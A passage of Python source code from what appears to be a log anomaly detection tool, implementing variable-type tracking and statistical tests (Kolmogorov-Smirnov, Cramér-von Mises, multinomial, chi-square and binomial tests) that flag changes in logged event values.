VT_old, self.var_type[event_index][var_index], var_index, log_atom, confidence) # Test and update if the values are in the specified range elif self.var_type[event_index][var_index][0] == 'range': self.var_type[event_index][var_index][3] += 1 # Check if the sum of distances of all values outside the defined limits is greater than range_threshold times the range of # the limits if sum(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) +\ sum(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) >\ self.range_threshold * (self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) # Reset counter if at least one value lies outside of the limits elif any(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) or\ any(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]): self.var_type[event_index][var_index][3] = 1 # Reinitialize the range limits if no value was outside of the range in the last num_reinit_range update steps elif self.learn_mode and self.num_reinit_range != 0 and\ self.var_type[event_index][var_index][3] % self.num_reinit_range == 0: self.var_type[event_index][var_index] = self.calculate_value_range( self.event_type_detector.values[event_index][var_index][-self.num_update:]) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Test and update for ascending values elif self.var_type[event_index][var_index][0] == 'asc': # Search for a not ascending sequence in the values for j in range(-self.num_update, 0): if self.event_type_detector.values[event_index][var_index][j - 1] >\ self.event_type_detector.values[event_index][var_index][j]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'desc': # Test and update for descending values for j in range(-self.num_update, 0): # Search for a not ascending sequence in the values if self.event_type_detector.values[event_index][var_index][j - 1] <\ self.event_type_detector.values[event_index][var_index][j]: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'd': # Test and update for values of the discrete type # Check if new values have appeared if len(set(new_values + self.var_type[event_index][var_index][1])) > len(self.var_type[event_index][var_index][1]): # New values have appeared # Test if vartype others if len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # Create the new value-set and expands the occurrence-list for the new values new_values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) for val in new_values_set: if val not in self.var_type[event_index][var_index][1]: self.var_type[event_index][var_index][1].append(val) self.var_type[event_index][var_index][2].append(0) # update the occurrences # List for the appearances of the new values values_app = [0] * len(self.var_type[event_index][var_index][1]) for i in range(-self.num_update, 0): values_app[self.var_type[event_index][var_index][1].index( self.event_type_detector.values[event_index][var_index][i])] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # No new values have appeared, so the normal test for discrete variables is used self.d_test(event_index, var_index) # Check if the values should be considered others or if the BT failed if (len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres)) or (sum( self.bt_results[event_index][var_index][0]) < self.d_bt_min_success): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.bt_results[event_index][var_index][0] = [1] * self.num_d_bt self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Update the probabilities of the discrete values if self.learn_mode and self.bt_results[event_index][var_index][0][-1]: # List for the number of appearance of the values values_app = [0 for x in range(len(self.var_type[event_index][var_index][1]))] for val in new_values: values_app[self.var_type[event_index][var_index][1].index(val)] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] # Check if the discrete distribution has to be updated if ((self.var_type[event_index][var_index][3] - self.num_init) % self.num_pause_discrete) == 0: self.d_init_bt(event_index, var_index) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time return # Test and update for static variables if self.var_type[event_index][var_index][0] == 'stat': # Check if still static if all(new_values[i] == self.event_type_detector.values[event_index][var_index][0] for i in range(self.num_update)): if self.var_type[event_index][var_index][2] and self.num_stat_stop_update is True and \ self.event_type_detector.num_event_lines[event_index] >= self.num_stat_stop_update: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len(self.var_type_history_list_reference[event_index]) >\ var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with' f' Path:\n{affected_path}\nbecause of its static values.', log_atom, affected_path, confidence=1 - 1 / self.num_stat_stop_update) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Check if new values appear to be of type others if len(set(new_values)) >= self.num_update * (1 - self.sim_thres) and self.num_update >= 3: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Change the var type from static to discrete # list of the values values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_init:])) # List to store the appearance of the values values_app = [0 for _ in range(len(values_set))] for j in range(-self.num_init, 0): values_app[values_set.index(self.event_type_detector.values[event_index][var_index][j])] += 1 values_app = [x / self.num_init for x in values_app] # Values follow a discrete pattern self.var_type[event_index][var_index] = ['d', values_set, values_app, self.num_init] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) return # Test and update for unique values if self.var_type[event_index][var_index][0] == 'unq': # Check if the new values are not unique if len(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) != self.num_update: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Check if one of the new values has appeared in the last self.num_update_unq values for j in self.event_type_detector.values[event_index][var_index][-self.num_update:]: if j in self.event_type_detector.values[event_index][var_index][ -self.num_update_unq - self.num_update:-self.num_update]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return return # Update for var type others if self.var_type[event_index][var_index][0] == 'others': # Do not update variable type if not self.learn_mode: return # Check if it has passed enough time, to check if the values have a new var_type if (self.var_type[event_index][var_index][1] + 1) % (self.num_pause_others + 1) == 0: # Added a exponential waiting time to avoid redundant tests if not consists_of_ints([np.log2((self.var_type[event_index][var_index][1] + 1) / (self.num_pause_others + 1))]): self.var_type[event_index][var_index][1] += 1 return # Checking for a new var_type vt_new = self.detect_var_type(event_index, var_index) # Only increase the number of skipped update-cycles if vt_new[0] == 'others': self.var_type[event_index][var_index][1] += 1 return # The variable gets assigned a new var_type # VarType is empiric distribution if vt_new[0] == 'emp': self.var_type[event_index][var_index] = vt_new self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif vt_new[0] in self.distr_list: self.var_type[event_index][var_index] = vt_new[:-1] self.alternative_distribution_types[event_index][var_index] = vt_new[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is discrete elif vt_new[0] == 'd': self.var_type[event_index][var_index] = vt_new self.d_init_bt(event_index, var_index) else: self.var_type[event_index][var_index] = vt_new self.print_changed_var_type(event_index, ['others'], vt_new, var_index, log_atom) else: self.var_type[event_index][var_index][1] += 1 def s_gof_get_quantiles(self, event_index, var_index): """Generate the needed quantiles of the distribution for the sliding gof-test.""" if self.var_type[event_index][var_index][0] == 'emp': # Get a list of almost equidistant indices indices = [int(i) for i in [self.num_init * j / (2 * self.num_s_gof_values) for j in range(2 * self.num_s_gof_values)]] # Get the list of values and sort them sorted_values = copy.copy(self.event_type_detector.values[event_index][var_index][-self.num_init:]) sorted_values.sort() # Generate the list of distribution values distr_val = [] for index in indices: distr_val.append(sorted_values[index]) self.distr_val[event_index][var_index] = distr_val return # Calculate the quantiles of the special distribution if self.var_type[event_index][var_index][0] == 'spec': ev = self.var_type[event_index][var_index][1] sigma = self.var_type[event_index][var_index][2] indices = 0 + np.array(range(2 * self.num_s_gof_values)) / (2 * self.num_s_gof_values - 1) * ( 1000 - 1) indices = indices.astype(int) # Generate the quantiles for the var type with the standardised quantiles self.distr_val[event_index][var_index] = self.quantiles['spec'][indices] * sigma + ev return # Calculate the quantiles of the mixed beta distribution if self.var_type[event_index][var_index][0] == 'betam': min_val = self.var_type[event_index][var_index][1] scale = self.var_type[event_index][var_index][2] proportion = self.var_type[event_index][var_index][5] indices1 = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))] indices2 = [i for i in range(1000) if i not in indices1] # Generate the quantiles for the var type with the standardised quantiles self.distr_val[event_index][var_index] = np.append( self.quantiles['betam1'][indices1] * scale + min_val, self.quantiles['betam2'][indices2] * scale + min_val) self.distr_val[event_index][var_index].sort() return def s_gof_test(self, event_index, var_index, first_distr): """ Make a gof-test. @return a list with the first entry True/False and as the second entry the maximal value of the step functions """ num_distr_val = 2 * self.num_s_gof_values if self.used_gof_test == 'KS': # Calculate the critical value for the KS-test # The parameters are in the list of the critical values distribution = self.var_type[event_index][var_index][0] if distribution == 'beta': distribution += str(self.var_type[event_index][var_index][-1]) if self.s_gof_alpha in self.crit_val_upd_ks and self.num_init in self.crit_val_upd_ks[self.s_gof_alpha] \ and self.num_s_gof_values in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init] \ and distribution in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values]: crit_value = \ self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution] else: crit_value = ((num_distr_val + self.num_s_gof_values) * (np.log(2 / self.s_gof_alpha)) / ( 2 * num_distr_val * self.num_s_gof_values)) ** (1 / 2) test_statistic = 0 # Scipy KS-test for uniformal distribution if self.var_type[event_index][var_index][0] == 'uni': test_statistic = kstest( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'uniform', args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]-self.var_type[event_index][ var_index][1]))[0] # Scipy KS-test for normal distribution elif self.var_type[event_index][var_index][0] == 'nor': test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'norm', args=( self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))[0] # Scipy KS-test for beta distributions elif self.var_type[event_index][var_index][0] == 'beta': if self.var_type[event_index][var_index][5] == 1: test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 0.5, 0.5, self.var_type[event_index][var_index][3], self.var_type[event_index][var_index][4] - self.var_type[ event_index][var_index][3]))[0] elif self.var_type[event_index][var_index][5] == 2: # Mu and sigma of the desired distribution [mu, sigma] = [5 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 5, 2, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 3: # Mu and sigma of the desired distribution [mu, sigma] = [2 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 2, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 4: # Mu and sigma of the desired distribution [mu, sigma] = [1 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 1, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 5: # Mu and sigma of the desired distribution [mu, sigma] = [5 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 5, 1, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] else: test_statistic = ks_2samp(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][var_index][ -self.num_s_gof_values:])[0] if first_distr: if test_statistic > crit_value: return [False, test_statistic] return [True, test_statistic] if test_statistic > crit_value: return [False, 1.0] return [True, 0.0] # Else self.used_gof_test == 'CM' # Calculate the critical value for the CM-test # The parameters are in the list of the critical values distribution = self.var_type[event_index][var_index][0] if distribution == 'beta': distribution += str(self.var_type[event_index][var_index][-1]) if distribution in ['uni', 'nor', 'beta1']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution] elif distribution in ['beta2', 'beta3']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2'] elif distribution in ['beta4', 'beta5']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'] else: crit_value = self.crit_val_hom_cm[self.s_gof_alpha][max(self.num_init, self.num_s_gof_values)][ min(self.num_init, self.num_s_gof_values)] test_statistic = 0 # Two sample CM-test for uniformal distribution if self.var_type[event_index][var_index][0] == 'uni': min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][1] - min_upd) / ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) +\ abs(self.var_type[event_index][var_index][2] - max_upd) / ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][1], min_upd) estimated_max = max(self.var_type[event_index][var_index][2], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'uniform') # Two sample CM-test for normal distribution elif self.var_type[event_index][var_index][0] == 'nor': test_statistic = cramervonmises(np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), 'norm', args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2])) # Two sample CM-test for beta distributions elif self.var_type[event_index][var_index][0] == 'beta': if self.var_type[event_index][var_index][5] == 1: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(0.5, 0.5)) elif self.var_type[event_index][var_index][5] == 2: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(5, 2)) elif self.var_type[event_index][var_index][5] == 3: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) max_upd = max_val + self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(2, 5)) elif self.var_type[event_index][var_index][5] == 4: ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (self.num_init + self.num_s_gof_values) estimated_min = min(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), self.var_type[event_index][var_index][3]) # Check if the estimated min and max differ more than the critical distance and return a negative test result if (abs(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - self.var_type[event_index][var_index][3]) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or ( max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]): return [False, 1] test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (ev_upd-estimated_min) * (1 / (5 + 1)-self.min_mod_upd_beta4) + self.min_mod_upd_beta4, 'beta', args=(1, 5)) elif self.var_type[event_index][var_index][5] == 5: ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (self.num_init + self.num_s_gof_values) estimated_max = max(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), self.var_type[event_index][var_index][4]) # Check if the estimated min and max differ more than the critical distance and return a negative test result if (abs(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - self.var_type[event_index][var_index][4]) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or ( max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]): return [False, 1] test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_max) / (estimated_max - ev_upd) * (1 / (5 + 1)-self.min_mod_upd_beta4) + 1 - self.min_mod_upd_beta4, 'beta', args=(5, 1)) else: test_statistic = cramervonmises2(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][ var_index][-self.num_s_gof_values:]) if first_distr: if test_statistic > crit_value: return [False, test_statistic] return [True, test_statistic] if test_statistic > crit_value: return [False, 1.0] return [True, 0.0] def d_test(self, event_index, var_index): """Make a test if the new variables follow the discrete distribution and append the result to the BT.""" if self.used_multinomial_test == 'MT': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # probability of the values or the test sample prob_of_sample = self.bt_results[event_index][var_index][1].pmf(values_app) # Sum of the probabilities, which are smaller than the probability of the values smaller_prob_sum = 0 if len(self.var_type[event_index][var_index][1]) <= 5: for a in range(self.num_update + 1): if len(self.var_type[event_index][var_index][1]) == 2: tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, self.num_update - a]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for b in range(self.num_update - a + 1): if len(self.var_type[event_index][var_index][1]) == 3: tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, b, self.num_update - (a + b)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for c in range(self.num_update - (a + b) + 1): if len(self.var_type[event_index][var_index][1]) == 4: tmp_prob = self.bt_results[event_index][var_index][1].pmf( [a, b, c, self.num_update - (a + b + c)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for d in range(self.num_update - (a + b + c) + 1): tmp_prob = self.bt_results[event_index][var_index][1].pmf( [a, b, c, d, self.num_update - (a + b + c + d)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob # Make a multinomial test if smaller_prob_sum < self.d_alpha: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return if self.used_multinomial_test == 'Chi': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # Make a chisquare test if chisquare(values_app, f_exp=[i * self.num_update for i in self.var_type[event_index][var_index][2]])[1] < \ self.d_alpha: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return # Make an approximated multinomial test which consists of binomial tests if self.used_multinomial_test == 'Approx': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # Makes for each value a twosided BT. If one fails the d-test fails for i, value in enumerate(values_app): if value < self.bt_results[event_index][var_index][1][i] or value > self.bt_results[event_index][var_index][2][i]: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return def d_init_bt(self, event_index, var_index): """Initialize the BT for discrete variables.""" if self.used_multinomial_test == 'MT': # Initialize the list for the results and the multinomialtest self.bt_results[event_index][var_index] = [ [1] * self.num_d_bt, multinomial(self.num_update, self.var_type[event_index][var_index][2])] elif self.used_multinomial_test == 'Approx': # Generates a list of the lower limits of the individual BTs of the single values lower_limit_list = self.num_update - self.bt_min_successes_multi_p( self.num_update, 1 - np.array(self.var_type[event_index][var_index][2]), self.d_alpha / 2, event_index, var_index) # Generates a list of the upper limits of the individual BTs of the single values upper_limit_list = self.bt_min_successes_multi_p( self.num_update, self.var_type[event_index][var_index][2], self.d_alpha / 2, event_index, var_index) # Initialize the list for the results self.bt_results[event_index][var_index] = [[1] * self.num_d_bt, lower_limit_list, upper_limit_list] else: # Initialize the list for the results self.bt_results[event_index][var_index] = [[1] * self.num_d_bt] def init_var_type_history_list(self, event_index): """Initialize the history of the variabletypes of the eventType.""" if len(self.var_type_history_list) < event_index + 1 or self.var_type_history_list[event_index] == []: for _ in range(event_index + 1 - len(self.var_type_history_list)): self.var_type_history_list.append([]) # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] if not self.var_type_history_list[event_index]: self.var_type_history_list[event_index] = [[[], [], [[], []], [], [], [], [[], []], [[], []]] for _ in range(len( self.var_type[event_index]))] # Append the first entries to the history list # Test only the variables with paths in the target_path_list if self.target_path_list is None: index_list = range(self.length[event_index]) # Test all variables else: index_list = self.variable_path_num[event_index] for var_index in index_list: # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for _, val in enumerate(tmp_type_val, start=1): val.append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) def get_indicator(self, event_index): """Calculate and returns a indicator for a change in the system behaviour based on the analysis of VTD.""" # List which stores the single indicators for the variables indicator_list = [] for var_index, var_val in enumerate(self.var_type_history_list[event_index]): if not self.event_type_detector.check_variables[event_index][var_index]: indicator_list.append(0) continue # List, which stores the differences of probabilities of the types, where the current history is higher than the reference. diff_list = [] # Length of the reference len_ref = self.num_var_type_hist_ref # Length of the current historylist len_cur = 